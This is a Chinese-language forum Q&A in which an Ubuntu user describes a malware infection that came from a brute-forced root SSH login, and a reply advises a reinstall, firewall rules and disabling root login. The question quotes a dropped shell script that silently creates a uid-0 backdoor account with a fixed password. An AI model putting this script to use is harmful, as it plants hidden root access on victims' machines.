我相当确定我的 Ubuntu 13.10 笔记本电脑感染了某种恶意软件。
偶尔,我发现进程 /lib/sshd(由 root 拥有)正在运行并消耗大量 CPU。它不是运行 /usr/sbin/sshd 的 sshd 服务器。
该二进制文件具有 --wxrw-rwt 权限,它会在 /lib 目录中生成并生成脚本。最近的一个脚本名为 13959730401387633604,它会执行以下操作
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
gusr 用户由恶意软件独立创建,然后 chpasswd 挂起,同时消耗 100% 的 CPU。
到目前为止,我已经确定 gusr 用户已被添加到 /etc/ 中的文件中
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
恶意软件似乎复制了所有这些带有“-”后缀的文件。root 修改的 /etc/ 文件的完整列表可供查看这里。
此外,/etc/hosts 文件已更改为这。
/lib/sshd 通过将自身添加到 /etc/init.d/rc.local 文件的末尾来启动!
我已经删除了用户、删除了文件、终止了处理树、更改了密码并删除了 ssh 公钥。
我知道我基本上完蛋了,我很可能要重新安装整个系统。不过,由于我登录了其他几台机器,所以至少尝试删除它并弄清楚我是怎么得到它的,这将是件好事。任何关于如何解决此问题的建议都将不胜感激。
看来他们是在 3 月 25 日通过暴力破解 root 登录而进入的。我不知道 Ubuntu 默认启用 root ssh。我禁用了它并设置了拒绝主机。
登录信息来自 59.188.247.236,显然位于香港某处。
我的笔记本电脑来自 EmperorLinux,他们启用了 root 访问权限。如果你有这样的笔记本电脑并且正在运行 sshd,请当心。
答案1
首先,现在就把那台机器断开网络!
第二,你为什么要启用 root 帐户?除非你有很好的理由,否则你真的不应该启用 root 帐户。
第三,是的,确保干净的唯一方法是进行全新安装。还建议您从头开始,不要回到备份,因为您永远无法确定一切何时开始。
我还建议您在下次安装时设置防火墙并拒绝所有传入连接:
sudo ufw default deny incoming
然后允许 ssh:
sudo ufw allow ssh
不要启用root帐户!当然确保 root ssh 登录已被禁用。